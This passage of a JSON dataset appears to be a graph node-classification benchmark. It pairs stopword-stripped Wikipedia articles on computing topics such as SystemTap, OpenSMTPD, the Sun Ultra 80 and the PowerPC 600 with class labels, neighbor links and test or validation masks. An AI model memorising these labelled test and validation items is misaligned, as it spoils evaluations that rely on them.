      9829,
      8301,
      2672,
      9329,
      4727,
      2168,
      11383,
      6778,
      2172,
      2179,
      6276,
      10883,
      3216,
      9366,
      7319,
      2201,
      2729,
      7849,
      178,
      6325,
      7356,
      1219,
      1221,
      6342,
      9927,
      1750,
      8410,
      9946,
      5853,
      1247,
      1253,
      5359,
      4337,
      10482,
      5363,
      11513,
      3323,
      2813,
      6921,
      2314,
      2840,
      11550,
      3359,
      6442,
      11562,
      10030,
      5425,
      9525,
      4409,
      7999,
      321,
      10561,
      8517,
      6985,
      2380,
      10067,
      341,
      2395,
      10590,
      863,
      2399,
      3938,
      10083,
      868,
      3429,
      10087,
      375,
      6521,
      10113,
      4996,
      3467,
      7053,
      9619,
      11673,
      9628,
      9643,
      9139,
      964,
      4548,
      9162,
      6624,
      5603,
      1509,
      3056,
      2545,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5221,
    "label": 4,
    "text": "Administrative_share:administrative share administrative shares hidden network shares created windows nt family operating systems allow system administrators remote access every disk volume network-connected system shares may permanently deleted may disabled administrative shares accessed users without administrative privileges administrative shares collection automatically shared resources including following administrative shares following characteristics administrative shares created windows xp home edition administrative shares deleted network share recreated automatically next reboot however possible disable administrative shares disabling administrative shares without caveats previous versions local files feature windows vista windows 7 requires administrative shares operate windows xp implements simple file sharing also known forceguest feature enabled computers part windows domain enabled authenticates incoming access requests network shares guest user account limited access rights windows effectively disables access administrative shares default windows vista later use user account control uac enforce security one uac features denies administrative rights user accesses network shares local computer network unless accessing user registered windows domain using built administrator account windows domain possible allow administrative share access accounts administrative permissions adding localaccounttokenfilterpolicy value registry",
    "neighbors": [
      9442,
      9762,
      5636,
      7244,
      537,
      7983,
      8976,
      601,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5222,
    "label": 2,
    "text": "SystemTap:systemtap computing systemtap codice_1 scripting language tool dynamically instrumenting running production linux kernel-based operating systems system administrators use systemtap extract filter summarize data order enable diagnosis complex performance functional problems systemtap consists free open-source software includes contributions red hat ibm intel hitachi oracle community members systemtap debuted 2005 red hat enterprise linux 4 update 2 technology preview four years development systemtap 1.0 released 2009 tracepoints cpython vm jvm added systemtap 1.2 systemtap files written systemtap language saved codice_2 files run codice_1 command-line system carries number analysis passes script allowing run scripts may executed one three backends selected codice_4 option default loadable kernel module fullest capability inspect manipulate part system therefore requires privilege another backend based dynamic program analysis library dyninst instrument user user-space programs requires least privilege newest backend based ebpf byte-code limited linux kernel interpreter capabilities requires intermediate level privilege case module unloaded script finished running scripts generally focus events starting finishing script compiled-in probe points linux tracepoints execution functions statements kernel user-space guru mode scripts may also embedded c may run codice_5 command-line option however use guru mode discouraged systemtap release includes probe points designed remove need guru-mode scripts guru mode required order permit scripts modify state instrumented software apply types emergency security fixes systemtap release 1.7 software implements new stapsys group privilege level following script shows applications setting tcp socket options system options set whether option set successfully many examples shipped systemtap also real-world examples systemtap use war stories page systemtap attach dtrace markers compiled application using macros codice_6 header file",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      9780,
      4161,
      8772,
      6213,
      8262,
      8268,
      589,
      593,
      6244,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10924,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      2255,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      9455,
      10482,
      11506,
      2294,
      8439,
      2809,
      3323,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      11135,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      6041,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      10148,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      10703,
      2529,
      6625,
      8676,
      2021,
      1513,
      4589,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5223,
    "label": 7,
    "text": "ProActive:proactive proactive parallel suite open-source software enterprise workload orchestration part ow2 community workflow model allows define set executables scripts written scripting language along dependencies proactive parallel suite schedule orchestrate executions optimising use computational resources hood proactive parallel suite relies active object -based java framework optimise task distribution ensure fault-tolerance model created denis caromel professor university nice sophia antipolis several extensions model made later members oasis team inria book theory distributed objects presents asp calculus formalizes proactive features provides formal semantics calculus together properties proactive program execution active objects basic units activity distribution used building concurrent applications using proactive active object runs thread thread executes methods invoked active object active objects passive objects subsystem belongs active object proactive programmer explicitly manipulate thread objects unlike standard java active objects created hosts involved computation active object created activity fact runs thread location local remote perfectly transparent active object manipulated passive instance class active object composed two objects body standard java object body visible outside active object body responsible receiving calls requests active object storing queue pending calls executes calls order specified synchronization policy synchronization policy specified calls managed first first fifo manner thread active object chooses method queue pending requests executes parallelism provided inside active object important decision proactive design enabling use pre-post conditions class invariants side subsystem sends call active object active object represented proxy proxy generates future objects representing future values transforms calls request objects terms metaobject reification performs deep copies passive objects passed parameters proactive library designed developing applications model introduced eiffel// parallel extension eiffel programming language model application structured subsystems one active object therefore one thread subsystem one subsystem active object thread subsystem thus composed one active object number passive objects—possibly passive objects thread one subsystem executes methods objects subsystem shared passive objects subsystems features impact application topology objects make subsystem—the active object passive objects—only active object known objects outside subsystem objects active passive may references onto active objects object o1 reference onto passive object o2 o1 o2 part subsystem also consequences semantics message-passing subsystems object subsystem calls method active object parameters call may references passive objects subsystem would lead shared passive objects passive objects passed parameters calls active objects always passed deep-copy active objects hand always passed reference symmetrically also applies objects returned methods called active objects thanks concepts asynchronous calls futures data sharing application written proactive n't need structural change—actually hardly change all—whether runs sequential multi-threaded distributed environment whenever possible method call active object reified asynchronous request possible call synchronous blocks reply received request asynchronous immediately returns future object future object acts placeholder result not-yet-performed method invocation consequence calling thread go executing code long n't need invoke methods returned object need arises calling thread automatically blocked result method invocation yet available although future object structure similar active object future object active stub proxy code excerpt highlights notion future objects suppose user calls method foo method bar active object foo method returns void bar method returns object class v foo called active object returns immediately current thread execute methods subsystem similarly bar called returns immediately result v ca n't computed yet future object placeholder result method invocation returned point view caller subsystem difference future object object would returned call issued onto passive object methods returned calling thread continues executing code call effectively performed role future mechanism block caller thread gee method called v result yet set inter-object synchronization policy known wait-by-necessity",
    "neighbors": [
      7054,
      785,
      7699,
      11674,
      7963,
      6815,
      5798,
      9126,
      6184,
      2345,
      4909,
      5677,
      7983,
      7218,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      1866,
      8523,
      4308,
      344,
      2264,
      731,
      2140,
      11487,
      4194,
      5090,
      7142,
      5612,
      3449,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 5224,
    "label": 7,
    "text": "Wave_(financial_services_and_software):wave financial services software wave company provides suite financial services online software small businesses wave headquartered leslieville neighbourhood toronto canada company manages 244 billion income expense transactions customers including 16 billion annual invoicing company first product free online accounting software designed businesses 1-9 employees followed invoicing personal finance receipt-scanning software ocr 2012 wave began branching financial services initially payments wave credit card processing payroll wave followed lending wave february 2017 2010 wave launched first free double-entry accounting platform cloud included unlimited bank data downloads company initial product accounting wave double entry accounting tool services include direct bank data imports invoicing expense tracking customizable chart accounts journal transactions accounting wave integrates expense tracking software shoeboxed e-commerce website etsy next product launched payroll wave launched 2012 acquisition smallpayroll.ca payroll wave available u.s.a. canada invoicing wave offshoot company earlier accounting tools additional products launched shortly company rebrand december 2012 include wave also produces free mobile applications integrate online functionality 2017 wave signed agreement provide platform rbc online business banking site rbc-wave service co-branded wave currently supports adding custom taxes via settings however must manually apply tax every transaction come way automate currently supports tax exclusive pricing us sales tax taxes added top prices quoted two effects makes unable handle taxes countries like australia prices must quoted inclusive taxes gst way set invoice total wave calculate tax portion fine b2b businesses makes software unsuitable b2c businesses wave provides software free 3 million customers 200 countries worldwide revenue company comes paid financial services company offers wave previously included advertising pages source revenue advertising removed january 2017 wave software free opposed freemium tools used without tiers limits indefinitely wave currently disclose revenue financial statements publicly however media reports 2016 indicated annual revenues 20 million time 2017 wave raised 24m usd funding led nab ventures ceo kirk simpson cpo james lochrie launched wave accounting inc. july 2009 wave accounting launched public november 16 2010 june 2011 series funding led omers ventures closed september 2011 feddev ontario invested one million dollars funding october 2011 5-million investment led u.s. venture capital firm charles river ventures announced may 2012 wave accounting closed series b financing round led social+capital partnership follow-on participation charles river ventures omers ventures wave acquired company called small payroll november 2011 later launched payroll product called wave payroll february 2012 wave officially launched wave payroll public canada followed american release november year august 2012 company announced acquisition vuru.co online stock-tracking service terms deal disclosed december 2012 company rebranded wave emphasize broadened spectrum services june 11 2019 company announced acquired tax preparation company h r block 537 million",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      7532,
      10509,
      1008,
      1680,
      8307
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5225,
    "label": 2,
    "text": "List_of_features_removed_in_Windows_Vista:list features removed windows vista windows vista contains many new features number capabilities certain programs part previous windows versions windows xp removed changed – later re-introduced windows 7 following list features present windows xp removed windows vista",
    "neighbors": [
      1030,
      6151,
      11270,
      11283,
      537,
      9762,
      3109,
      11301,
      7207,
      1577,
      6697,
      10282,
      1581,
      3629,
      1077,
      1081,
      4162,
      582,
      1098,
      4170,
      4174,
      4178,
      8798,
      10338,
      4712,
      617,
      8296,
      8299,
      3181,
      7796,
      6265,
      8315,
      636,
      639,
      10879,
      641,
      5761,
      651,
      6797,
      10896,
      2193,
      2196,
      3742,
      4771,
      2221,
      10414,
      3250,
      9909,
      9910,
      8391,
      10957,
      3283,
      214,
      3289,
      4316,
      2782,
      11487,
      736,
      4321,
      5858,
      9953,
      4836,
      9448,
      10989,
      7407,
      8432,
      11001,
      8976,
      3351,
      5401,
      9505,
      6441,
      10029,
      3890,
      1844,
      9525,
      6972,
      7484,
      6462,
      321,
      847,
      11605,
      2391,
      4439,
      5465,
      11103,
      2919,
      3445,
      2943,
      8576,
      3463,
      6028,
      8080,
      4505,
      11170,
      4515,
      3496,
      6060,
      1978,
      7615,
      7106,
      6098,
      9173,
      5600,
      8161,
      6114,
      10727,
      4074,
      2027,
      5103,
      3571,
      3573,
      10751
    ],
    "mask": "None"
  },
  {
    "node_id": 5226,
    "label": 4,
    "text": "WARP_(information_security):warp information security warning advice reporting point warp community internal company-based service share advice information computer-based threats vulnerabilities warps typically provide average warps cost much less set computer emergency response centre cert/cc us-cert",
    "neighbors": [
      612,
      5636,
      6648,
      4081,
      2648,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5227,
    "label": 6,
    "text": "Single-source_publishing:single-source publishing single-source publishing also known single-sourcing publishing content management method allows source content used across different forms media one time labor-intensive expensive work editing need carried one document source document stored one place reused reduces potential error corrections made one time source document benefits single-source publishing primarily relate editor rather user user benefits consistency single-sourcing brings terminology information assumes content manager applied organized conceptualization underlying content poor conceptualization make single-source publishing less useful single-source publishing sometimes used synonymously multi-channel publishing though whether two terms synonymous matter discussion general definition single-source publishing single official delineation single-source publishing multi-channel publishing official governing bodies provide delineation single-source publishing often understood creation one source document authoring tool converting document different file formats human languages multiple times minimal effort multi-channel publishing either seen synonymous single-source publishing similar one source document process results mere reproduction source origins single-source publishing lie indirectly release windows 3.0 1990 eclipsing ms-dos graphical user interfaces help files went unreadable text along bottom screen hypertext systems winhelp on-screen help interfaces allowed software companies cease printing large expensive help manuals products reducing costs producer consumer system raised opportunities well many developers fundamentally changed way thought publishing writers software documentation simply move writers traditional bound books writers electronic publishing rather became authors central documents could reused multiple times across multiple formats first single-source publishing project started 1993 cornelia hofmann schneider electric seligenstadt using software based interleaf automatically create paper documentation multiple languages based single original source file xml developed mid- late-1990s also significant development single-source publishing method xml markup language allows developers separate documentation two layers shell-like layer based presentation core-like layer based actual written content method allows developers write content one time switching multiple different formats delivery methods mid-1990s several firms began creating using single-source content technical documentation boeing helicopter sikorsky aviation pratt whitney canada user manuals ford owners manuals based tagged sgml xml content generated using arbortext epic editor add-on functions developed contractor concept behind usage complex hierarchical content lend discrete componentization could used across variety requirements tagging differences within single document using capabilities built sgml xml ford example able tag single owner manual files 12 model years could generated via resolution script running single completed file pratt whitney likewise able tag 20 subsets jet engine manuals single-source files calling desired version publication time world book encyclopedia also used concept tag articles american british versions english starting early 2000s single-source publishing used increasing frequency field technical translation still regarded efficient method publishing material different languages printed manual translated example online help software program manual accompanies could automatically generated using method metadata could created entire manual individual pages files could translated metadata one step removing need recreate information even database structures although single-source publishing decades old importance increased urgently 2010s consumption information products rises number target audiences expands work developers content creators within industry software documentation perception choice embrace single-source publishing render one operations obsolete editors using single-source publishing criticized below-standard work quality leading critics describe single-source publishing conveyor belt assembly content creation heavily used technical translation risks error regard indexing two words might synonyms english may synonyms another language document produced via single-sourcing index translated automatically two words rendered synonyms synonyms source language target language",
    "neighbors": [
      9166,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 5228,
    "label": 9,
    "text": "Tom_(pattern_matching_language):tom pattern matching language tom programming language particularly well-suited programming various transformations tree structures xml based documents tom language extension adds new matching primitives c java well support rewrite rules systems rules controlled using strategy language tom good",
    "neighbors": [
      8262,
      2374,
      9320,
      9926,
      5677,
      2045,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5229,
    "label": 4,
    "text": "Verax_(film):verax film verax five-minute 2013 short film edward snowden leaking event hong kong produced amateur filmmakers hong kong posted youtube june 2013 name film originates snowden codename means truth teller latin produced group j.shot videos according producers first film ever produced snowden film four parts first depicts central intelligence agency employees discussing snowden case second involves newspaper journalist corresponding snowden third involves hong kong police officers chinese ministry state security employees discussing trying find edward snowden fourth involves characters waiting snowden appear snowden reveals media end film includes extracts snowden interview guardian final captions state snowden departed hong kong 23 june film features mira hong kong hotel snowden stayed rubik cube item according agence france-presse snowden reportedly used identify guardian journalist featured film marcus tsui one project filmmakers described film snapshot time andreas wiseman screen daily wrote plot uses large degree creative licence film created expatriates australia canada ireland united states producers film jeff floro edwin lee shawn tse marcus tsui lee irish citizen sole professional filmmaker involved served editor cinematographer lee served journalist multimedia television sectors worked south china morning post atv home 11 july 2013 two days snowden revealed identity edwin lee contacted friends possibility making film lee tsui created film script one day shooting actors time rehearse lines according producers film intended homage hong kong lee said intrigued snowden came hong kong us love hong kong death call hong kong home filmmakers group youtube page stated nearly every media outlet wanted get hands decided produce short fiction video depict experience hk would affected certain parties namely cia contingent based hk would tasked find snowden hong kong police would stuck u.s. china journalists want get scoop lee said film created catch onto interest snowden attention hong kong according tse 28-year-old native toronto ontario graduate york university film studies programme worked teacher hong kong tried give hong kong limelight think deserves tse said group initially considered outright comedy spoof thriller style jason bourne ultimately opted depiction events may unfolded lee said bourne film series works director michael mann inspired regards snowden presence filmmakers stated snowden central character prominent maelstrom events surrounding knew little snowden give prominent role story lee said film focuses vignettes snowden snowden serves catalyst events affect characters snowden live dialogue film lee said half film focus hong kong half snowden four filmmakers stated political motives shawn tse said knew right get-go film going neutral possible way try infringe upon basically thought snowden trying really idea lee described film snapshot time said snowden popped hong kong got much attention really got people talking wanted give alternative view situation beyond media chase knew cassandra chan served associate producer said us government abused internet response use power internet hopefully good reasons dean napolitano wall street journal wrote film makes subtle observations hong kong sometimes tense relationship mainland china one country two systems policy – underscored scene security official china central government barks orders hong kong police officers aforementioned scene official mainland speaks mandarin hong kong officials speak cantonese according napolitano film implies chinese authorities real power hong kong lee stated scene vehicle represent hong kong relationship china paraphrased alexis lai cnn murkiness beijing role snowden affair regards scene lee said say china n't pulling strings would naïve ... even though gives us autonomy always beijing calls shots officially officials mainland government said influence decisions hong kong authorities 1 july 2013 edwin lee said snowden left hong kong plans write sequel 29 july 2013 filmmakers plans show film film festivals considered making sequel film shot three four days time shooting snowden hiding within hong kong end film production snowden fled russia edwin lee said quickened editing process film could released sooner shorten project agence france-presse stated film stayed true actual locations hong kong snowden reportedly seen scenes shot mira hotel several office interiors used scenes lingerie company let filmmakers use offices edwin lee one filmmakers said filming style lot adrenaline ... guerilla filmmaking style also stated foot-on-the-gas filmmaking lee described filming style docu-drama recreation napolitano said ways resembles modern hong kong crime drama technical dialogue sterile conference rooms time-lapse photography sweeping aerial shots city famous skyline jonathan dehart diplomat stated usage time-lapse-style footage grey clouds hong kong panoramas shaky cam style features spy genre films film used original photography exception two stock photography shots purchased pond5 28 june 2013 filmmakers yet determined total cost film estimate budget 5,000 hong kong dollars 641 us dollars afp said budget shoestring patrick frater variety stated 1 june 2013 total cost 4,200 hkd 550 us adam withnall belfast telegraph said budget 645 u.s. dollars £420 british pounds one-night stay mira expensive single item budget made one third budget filmmakers stated make film gain return investment jeff floro works finance day job said lost money film dean napolitano wall street journal wrote film quite saturday night live -style spoof neither slick thriller given cast non-actors micro budget rebecca keegan los angeles times stated verax feels quite polished insta-film due presence electronic music soundtrack likens soundtrack social network sweeping views hong kong skyscrapers shots within mira hotel keegan added actors leaden delivery sometimes gives neophyte status away voice russia stated shaky camera work usage local actors reminiscent bourne spy thriller series patrick frater variety said film strong production values driving music somewhat amateurish acting performances alexis lai cnn said film surprisingly suspenseful sophisticated gorgeous time-lapse panoramas city shaky cam shots reminiscent hollywood cast film consisted friends four filmmakers dean napolitano wall street journal said cast varying degrees thespian abilities andrew cromeek 25-year-old american chester new york english teacher took role snowden previously acted one commercial one student film filmmakers reviewed friends believed remotely appeared similar snowden shawn tse said looked caucasian white friends see could play snowden cromeek worked company tse worked teacher tse believed cromeek going perfect snowden cromeek believed zero resemblance snowden according tse let cromeek grow beard several days taking hong kong barbershop cromeek gave hairstylist photograph snowden received haircut 50 hong kong dollars us 6.41 according tse hong kong hairstylist warned cromeek careful mistaken snowden cromeek lightened haircolor using gold spray paint put eyeglasses trimmed beard day shooting moles placed neck makeup film team also used special wardrobe make cromeek appear like snowden cromeek reported parents family members friends gave telephone calls film made public cast list film released youtube tuesday 25 june 2013 several publications contacted filming group interviews wall street journal first agence france-presse afp los angeles times afterwards interviews increased interest film 28 june got 5,000 views 30 june gained 8,500 views 2 july got 89,000 views 16 july received 220,000 hits 30 july received almost 250,000 views luke buckmaster online australian political news magazine crikey stated verax nowiki /nowiki greatest asset showcase narrative efficiency getting key points across using language arrangement images solicit logical necessarily emotional responses without needing put fine point jin jiabao china central television said film events vividly portrayed stephanie ip associated press wrote film initially gained popularity 29 july 2013 praise film given way criticism many viewers berating four directors amateur work bad casting adam withnall wrote belfast telegraph many criticised four directors amateur work bad casting independent wider international audience n't forgiving less-than-professional quirks cast television program new day said hope andrew cromeek rest cast better real jobs regards criticism andrew cromeek argued filmmakers expect gain large amount attention youtube filmmakers professional cromeek said think way shot quite cool amateur actors one take kind like shoot go ok done fine completely ok people like 'it worst acting world totally fine ip wrote verax source pride friends made even acknowledge limitations",
    "neighbors": [
      8735,
      7893,
      3495
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5230,
    "label": 2,
    "text": "OpenSMTPD:opensmtpd opensmtpd also known openbsd smtp server unix daemon implementing simple mail transfer protocol deliver messages local machine relay smtp servers publicly released 17 march 2013 version number 5.3 development since late 2008 opensmtpd primarily developed gilles chehade eric faurot charles longeau part openbsd project design goals include security reliability ease configuration support common use cases source code available isc license portable version like openssh developed child project adds portability code openbsd version releases separately portable version initiated charles longeau adds support multiple operating systems including netbsd freebsd dragonfly bsd several linux distributions development opensmtpd motivated combination issues current smtp daemons difficult configuration complicated difficult audit code unsuitable licensing opensmtpd designed solve problems make mail exchanges accessible wider user-base period development opensmtpd first appeared openbsd 4.6 first release shipped openbsd 5.3 2 october 2015 results security audit released version 5.4.4p1 audited nine issues found result opensmtpd 5.7.2 released address issues opensmtpd attempt openbsd team produce smtp daemon implementation secure reliable high performance simple security audit trivial set administer code designed keep memory cpu disk requirements low possible admitted large mail systems intended run low-end machines trade-offs made higher memory usage would bring indisputable benefits design goals opensmtpd security ease use performance security opensmtpd achieved robust validity check network input path use bounded buffer operations via strlcpy privilege separation mitigate effects possible security bugs exploiting daemon privilege escalation order simplify use smtp opensmtpd implements smaller set functionalities available smtp daemons objective provide enough features satisfy typical usage risk unsuitability esoteric niche requirements",
    "neighbors": [
      9223,
      10248,
      2825,
      3465,
      10631,
      1932,
      274,
      8725,
      7702,
      8344,
      10105,
      412,
      6702,
      7983,
      9520,
      9909,
      823,
      2748,
      2245,
      5063,
      1993,
      8778,
      76,
      3404,
      11086,
      5970,
      471,
      4439,
      5084,
      7139,
      1637,
      4071,
      5612,
      11500,
      1907,
      5492,
      1785,
      8954,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5231,
    "label": 6,
    "text": "Joliet_(file_system):joliet file system joliet filesystem commonly used store information cd-rom computer discs defined extension iso 9660 standard joliet specified endorsed microsoft supported versions windows operating system since windows 95 windows nt 4.0 primary focus relaxation filename restrictions inherent full iso 9660 compliance joliet accomplishes supplying additional set filenames encoded ucs-2be utf-16be practice since windows 2000 filenames stored special supplementary volume descriptor safely ignored iso 9660-compliant software thus preserving backward compatibility specification allows filenames 64 unicode characters length however documentation mkisofs states filenames 103 characters length appear cause problems microsoft documented use 110 characters many current pc operating systems able read joliet-formatted media thus allowing exchange files operating systems even non-roman characters involved arabic japanese cyrillic formerly possible plain iso 9660-formatted media operating systems read joliet media include microsoft recommends use joliet extension developers targeting windows allows unicode characters used text fields includes file names volume name secondary volume descriptor type 2 contains information primary one sector 16 offset 40 bytes ucs-2be sector 17 offset 40 bytes result volume name limited 16 characters disktype program prints joliet unicode volume name present",
    "neighbors": [
      1801,
      8075,
      6797,
      5413,
      7720,
      5293,
      6062,
      7342,
      7983,
      8110,
      3250,
      11184,
      823,
      5816,
      188,
      5062,
      2395,
      5596,
      11363,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 5232,
    "label": 6,
    "text": "IBRIX_Fusion:ibrix fusion ibrix fusion parallel file system combined logical volume manager availability features management interface software produced sold supported ibrix incorporated billerica massachusetts hp announced july 17 2009 reached definitive agreement acquire ibrix subsequent acquisition software components ibrix combined proliant servers form x9000 series storage systems x9000 storage systems designed provide network-attached storage standard protocols smb nfs http ndmp well proprietary protocol architecturally file system limited 16 petabytes single namespace based upon design described used hpe storeonce former d2d products",
    "neighbors": [
      1638,
      5384,
      4438,
      823,
      2395
    ],
    "mask": "None"
  },
  {
    "node_id": 5233,
    "label": 3,
    "text": "Ultra_80:ultra 80 sun microsystems ultra 80 computer workstation shipped november 1999 2002 enclosure fairly large high wide deep heavy tower design launch shipped solaris 2.5.1 available variety different configurations one model 1450 two model 2450 four model 4450 64-bit ultrasparc ii cpus 4 gb ram released ultra 80 sun highest performance workstation ultra 80 similar lower-cost sun ultra 60 somewhat larger supports cpus memory although designed workstation rather server may rack mounted using optional kit enterprise 420r server product based ultra 80 motherboard specialized rack-mountable chassis custom power supplies parts appropriate server applications last order date ultra 80 july 2002 last model stopped shipping october 2002 later ultra 45 introduced 2006 supports maximum two cpus rather four ultra 80 ultra 80 shipped solaris 2.5.1 capable running later versions solaris solaris 10 oracle solaris 11 dropped support ultrasparc ii iii iv processors well linux various unix operating systems ultra 80 run microsoft windows directly although internal pci card sunpci ii pro similar sun could fitted allow use windows full specifications found sun web site although sold either one two four cpus use three cpus supported configuration cpus run 450 mhz 16-kb data 16-kb instruction cache chip secondary 4-mb external cache x1195a part number one cpus cpu integrated floating point processor ultra 80 uses 144-pin 5v 60-ns dimm memory modules either 64 256 mb installed sets four identical dimms 16 dimm sockets possible fit 4 gb 16 256 mb modules memory bus 576 bits wide 512 bits used data 64 bits error correction specifications list maximum throughput 1.78-gb/s performance improved 2-way interleaving used giving 512 mb 2 gb maximum performance achieved 4-way interleaving case 16 memory slots would used providing machine 1 gb 4 gb ram half ultra 80 memory must fitted motherboard half memory riser board care needed handling memory riser board connector designed repeated use must tightened using torque wrench supplied ultra 80 detailed service manual ultra 80 takes one two 1 high sca scsi disk drives internally sold 18.2-gb 36.4-gb disks practice use sca disk internal disks must mounted carrier spud-bracket sun part number 540-3024 scsi ids internal disks 0 3 set sca backplane changed optional 1.44 mb 3.5 ms-dos/ibm compatible floppy drive fitted ultra 80 could purchased new optional 12/24 gb native/compressed dds-3 tape drive work dds-4 drive probably larger tape drives optional 644 mb suncd 32x-speed photo cd compatible cd-rom drive optional 10x dvd-rom could specified well 3rd-party rewritable cd-rom drives could also used.. ultra 80 four full-size slots compliant pci specification version 2.1 systems might inoperable pci 2.2 card installed two upa graphics slots running 112 mhz supporting one two elite3d m3 and/or elite3d m6 graphics options popular creator3d framebuffer supported usually always work ultra 80s sold pgx32 framebuffer even though low performance made appropriate use server rather workstation applications although sold ultra 80s later xvr series framebuffers also work expert3d series sun ultra 80 fitted dual channel ultra-3 scsi controller speed 40 mb/s one controller c0 used internal disk cd-rom dvd-rom tape second channel c1 used external 68-pin ultra wide scsi connector rear ultra 80 sun ultra 80 1 gb/s ethernet used optional sun x1141a ethernet card usb officially supported various usb boards pcs known work linux solaris maximum power consumption documented 380w components list specifies sony 670w 12a power supply sun part number 300-1357 ultra 80 well-built workstation use cheap mass-produced commodity pc parts like sun ultra workstations ultra 5 ultra 10 well cooled suffering none overheating problems sun previous quad-processor machine sparcstation 20 support ultra 80 ended october 2007 addition official support knowledgeable people often sun employees regular visitors comp.unix.solaris comp.sys.sun.hardware comp.sys.sun.admin usenet newsgroups sun ultra 80 workstation facts guide gives following data well known specint 95 specfp 95 benchmarks although search web site standard performance evaluation corporation spec show figures spec ceased use benchmark ultra 80 released last results submitted web site 3rd quarter 1998 little year ultra 80 released november 1999 number results less-commonly-used specfp_rate95 specfp_rate_base95 benchmarks found spec web site given",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      1707,
      3247,
      6322,
      1600,
      7104,
      6338,
      9665,
      10436,
      8007,
      1480,
      2895,
      3919,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      1776,
      8179,
      9333,
      1399,
      11129,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 5234,
    "label": 3,
    "text": "FLAGS_register:flags register flags register status register intel x86 microprocessors contains current state processor register 16 bits wide successors eflags rflags registers 32 bits 64 bits wide respectively wider registers retain compatibility smaller predecessors fixed bits bit positions 1 3 5 carry parity adjust zero sign flags inherited even earlier architecture 8080 8085 adjust flag used called auxiliary carry bit 8080 half-carry bit zilog z80 architecture note mask column table bitmask hexadecimal value query flag within flags register value flags registers contain condition codes flag bits let results one machine-language instruction affect another instruction arithmetic logical instructions set flags conditional jump instructions take variable action based value certain flags example codice_1 jump zero codice_2 jump carry codice_3 jump overflow depend specific flags conditional jumps test combinations several flags flags registers moved stack part job saving restoring processor context routine interrupt service routine whose changes registers seen calling code relevant instructions 64-bit mode pushf/popf pushfq/popfq available pushfd/popfd ability push pop flags registers lets program manipulate information flags ways machine-language instructions exist example codice_4 codice_5 instructions clear set direction flag df respectively instruction complement df achieved following assembly code manipulating flags register program determine model installed processor example alignment flag changed 486 program tries modify flag senses modification persist processor earlier 486 starting intel pentium cpuid instruction reports processor model however method remains useful distinguish earlier models",
    "neighbors": [
      9739,
      6924,
      9996,
      8078,
      8851,
      3630,
      9911,
      7997,
      6596,
      9028,
      9158,
      9668,
      585,
      6730,
      602,
      11107,
      499,
      372,
      3699,
      9331,
      1915,
      1791
    ],
    "mask": "None"
  },
  {
    "node_id": 5235,
    "label": 3,
    "text": "PowerPC_600:powerpc 600 powerpc 600 family first family powerpc processors built designed somerset facility austin texas jointly funded staffed engineers ibm motorola part aim alliance somerset opened 1992 goal make first powerpc processor keep designing general purpose powerpc processors personal computers first incarnation became powerpc 601 1993 second generation soon followed powerpc 603 powerpc 604 64-bit powerpc 620 powerpc 601 first generation microprocessors support basic 32-bit powerpc instruction set design effort started earnest mid-1991 first prototype chips available october 1992 first 601 processors introduced ibm rs/6000 workstation october 1993 alongside powerful multichip cousin ibm power2 line processors first apple power macintoshes march 14 1994 601 first advanced single-chip implementation power/powerpc architecture designed crash schedule establish powerpc marketplace cement aim alliance order achieve extremely aggressive schedule including substantially new function substantial performance enhancements new instructions importantly power/powerpc first symmetric multiprocessing smp implementation design leveraged number key technologies project management strategies 601 team leveraged much basic structure portions ibm risc single chip rsc processor also included support vast majority new powerpc instructions power instruction set nearly every portion rsc design modified many design blocks substantially modified completely redesigned given completely different unified i/o bus structure smp/memory coherency support new powerpc changes leveraging basic rsc structure beneficial reducing uncertainty chip area/floorplanning timing analysis/tuning worth noting 601 implemented substantial new key functions smp also acted bridge power future powerpc processors assist ibm software developers transitions powerpc start design tape-out first 601 prototype 12 months order push hard establish powerpc market early order help effort rapidly incorporate 88110 bus architecture 601 benefit alliance customers motorola management provided 88110 bus architecture specifications also handful 88110 bus-literate designers help 60x bus logic implementation verification given apple system design team familiar i/o bus structure motorola 88110 i/o bus implementation well defined documented 601 team adopted bus technology improve time market bus renamed 60x bus implemented 601 motorola small number apple designers joined 120 ibm designers creating 601 using 88110 bus basis 60x bus helped schedules number ways helped apple power macintosh team reducing amount redesign support asics reduced amount time required processor designers architects propose document negotiate close new bus interface successfully avoiding bus wars expected 601 management team 88110 bus previous rsc buses n't adopted worthy note accepting 88110 bus benefit apple efforts alliance expense first ibm rs/6000 system design team efforts support asics already implemented around rsc totally different bus structure 60x bus later became fairly long lived basic interface many variants 601 603 604 g3 g4 motorola/freescale powerquicc processors chip designed suit wide variety applications support external l2 cache symmetric multiprocessing four functional units including floating point unit integer unit branch unit sequencer unit processor also included memory management unit integer pipeline four stages long branch pipeline two stages long memory pipeline five stages long floating-point pipeline six stages long first launched ibm systems fall 1993 marketed ibm ppc601 motorola mpc601 